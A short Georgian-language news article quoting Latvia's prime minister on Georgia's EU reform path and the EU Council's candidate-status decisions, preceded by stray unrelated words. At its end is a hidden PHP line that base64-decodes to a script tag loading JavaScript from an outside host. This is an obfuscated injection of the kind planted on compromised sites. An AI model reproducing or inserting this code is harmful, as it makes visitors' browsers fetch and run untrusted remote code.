celsiusi
ავერსი შნაიდერი

საქართველოს მთავრობას აქვს ყველა შესაძლებლობა, რომ განახორციელოს რეფორმები, რომლებიც კარგად არის ცნობილი მთავრობისთვის, – აცხადებს ლატვიის პრემიერ-მინისტრი კრიშიანის კარინში.

ლატვიის პრემიერი აცხადებს, რომ ევროპის მხრიდან კარი ღიაა და იმედი გამოთქვა, რომ საქართველოს მთავრობა გადადგამს საჭირო ნაბიჯებს.

„ეს ყველაფერი შესაძლებელია. რეფორმები, რომლებიც ჩვენ განვახორციელეთ ევროკავშირში გაწევრიანებამდე, იყო უკიდურესად მნიშვნელოვანი ჩვენთვის და ამან ჩვენი მმართველობა გააუმჯობესა. სწორედ ეს არის ერთ-ერთი მიზეზი იმისა, რომ ცხოვრების დონე უმჯობესდება. ამიტომ რეფორმების ჩატარება ღირს, ევროპის მხრიდან კარი ღიაა და ჩვენ იმედი გვაქვს, რომ საქართველოს მთავრობა გადადგამს საჭირო ნაბიჯებს“, – აცხადებს ლატვიის პრემიერი.

ევროკავშირის საბჭომ გუშინ გადაწყვიტა, აღიაროს საქართველოს ევროპული პერსპექტივა და მზადაა, ევროკავშირის წევრობის კანდიდატის სტატუსი მიანიჭოს, როგორც კი დასახული პრიორიტეტები შესრულდება. ევროკავშირის საბჭოს გადაწყვეტილებით, უკრაინასა და მოლდოვას გუშინვე მიენიჭათ ევროკავშირის წევრობის კანდიდატის სტატუსი.

497
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");